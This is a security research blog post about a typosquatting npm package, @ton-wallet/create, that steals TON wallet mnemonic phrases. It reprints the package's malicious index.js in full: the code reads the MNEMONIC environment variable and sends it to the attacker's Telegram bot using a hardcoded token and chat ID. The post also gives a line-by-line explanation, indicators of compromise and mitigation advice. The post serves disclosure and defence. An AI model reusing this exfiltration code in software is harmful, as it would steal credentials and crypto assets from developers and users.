Research
Socket Research Team
February 24, 2025
The Socket Research Team has discovered a malicious npm package, @ton-wallet/create, that has been stealing mnemonic phrases from unsuspecting users and developers in the TON ecosystem. TON was built around The Open Network blockchain originally developed by Telegram and is widely used for decentralized applications (dApps), smart contracts, and cryptocurrency transactions. With a growing developer community and integration with popular platforms like Telegram, the ecosystem has become a target for supply chain attacks.
The package has remained live for six months, impersonating the legitimate @ton/ton package. This attack poses severe supply chain security risks, targeting developers and users integrating TON wallets into their applications. Below is the legitimate package and the malicious one that is still live on npm.
Real Package (@ton/ton)
Malicious Package (@ton-wallet/create)
For six months, this malicious npm package went unnoticed in the JavaScript ecosystem. Our investigation found that the @ton-wallet/create package was exfiltrating sensitive mnemonic phrases—crucial keys that unlock cryptocurrency wallets. While this package remained largely undetected, it posed a severe risk to developers and blockchain enthusiasts who might unknowingly fall into its trap.
The threat actor's strategy was straightforward but effective. By mimicking the legitimate @ton/ton package, widely used in the TON blockchain community, @ton-wallet/create gained credibility. Its subtle name similarity misled developers into believing they were installing a genuine dependency. However, this package was created to intercept and steal mnemonic phrases.
Despite being available for an extended period, it has managed to stay under the radar without being flagged. In contrast, the legitimate @ton/ton package, which is widely used and trusted within the developer community, boasts an impressive 64,804 weekly downloads. This significant usage highlights the level of trust developers place in the real TON package, underscoring the potential risks posed by the malicious package impersonating it.
For further details, check the malicious code here: Socket Security Analysis
At the heart of this attack lies the process.env.MNEMONIC variable. This environment variable is commonly used in Node.js applications to store sensitive secrets, including wallet recovery phrases. Mnemonic phrases, typically a sequence of 12 or 24 words, grant full access to a cryptocurrency wallet. Stealing such a phrase is equivalent to seizing complete control over a user's digital assets. Recognizing this, attackers designed @ton-wallet/create to silently capture and exfiltrate these phrases without raising suspicion.
The potential impact of this attack extends across multiple groups:
The package specifically targeted TON users, a community with a user base of over 1 million. Given the widespread adoption of the TON wallet, the potential scale of this attack was significant, making it imperative to address the threat before it escalated further.
Upon closer examination of the index.js file inside the malicious package, we made a concerning discovery:
const TelegramBot = require("node-telegram-bot-api");
function createWallet() {
const token = '7493700888:AAGJ5nyXemePuHqleSOqkIM23Yhs0o01q-Q'; // Attacker's bot token
const chatId = '-1002197015763'; // Attacker's Telegram chat ID
const bot = new TelegramBot(token, { polling: false }); // Silent message dispatch
bot.sendMessage(chatId, `env.KEY=` + process.env.MNEMONIC);
return process.env.MNEMONIC;
}
exports.createWallet = createWallet;This script is a malicious Node.js function that steals sensitive environment variables and sends them to an attacker's Telegram bot.
const TelegramBot = require("node-telegram-bot-api");It imports the `node-telegram-bot-api` package, enabling interaction with Telegram bots.
function createWallet() {
const token = '7493700888:AAGJ5nyXemePuHqleSOqkIM23Yhs0o01q-Q';
const chatId = '-1002197015763';createWallet function retrieves an environment variable (likely a cryptocurrency wallet mnemonic) and sends it to an attacker's Telegram bot.const bot = new TelegramBot(token, { polling: false });
bot.sendMessage(chatId, `env.KEY=` + process.env.MNEMONIC);TelegramBot class is created with { polling: false }, ensuring it only sends messages.MNEMONIC environment variable, constructs a message in the format env.KEY=actual_value, and sends it to the attacker's Telegram chat.To mitigate these risks, developers and organizations must take proactive measures to secure their software supply chains. Regular dependency audits and automated scanning tools should be employed to detect anomalous or malicious behaviors in third-party packages before they are integrated into production environments.
By integrating these security measures into development workflows, organizations can significantly reduce the likelihood of supply chain attacks.We have reported this malicious package to the npm team, and it is scheduled for removal to prevent further attacks.
@ton-wallet/create7493700888:AAGJ5nyXemePuHqleSOqkIM23Yhs0o01q-QChat 1002197015763index.js (within @ton-wallet/create package)dist/index.js (within @ton-wallet/create package)Dhanesh Dodia
Sambarathi Sai
Dwijay Chintakunta
Subscribe to our newsletter
Get notified when we publish new security blog posts!
Try it now
Security News
Newly introduced telemetry in devenv 1.4 sparked a backlash over privacy concerns, leading to the removal of its AI-powered feature after strong community pushback.
Security News
TC39 met in Seattle and advanced 9 JavaScript proposals, including three to Stage 4, introducing new features and enhancements for a future ECMAScript release.
Security News
Deno 2.2 enhances Node.js compatibility, improves dependency management, adds OpenTelemetry support, and expands linting and task automation for developers.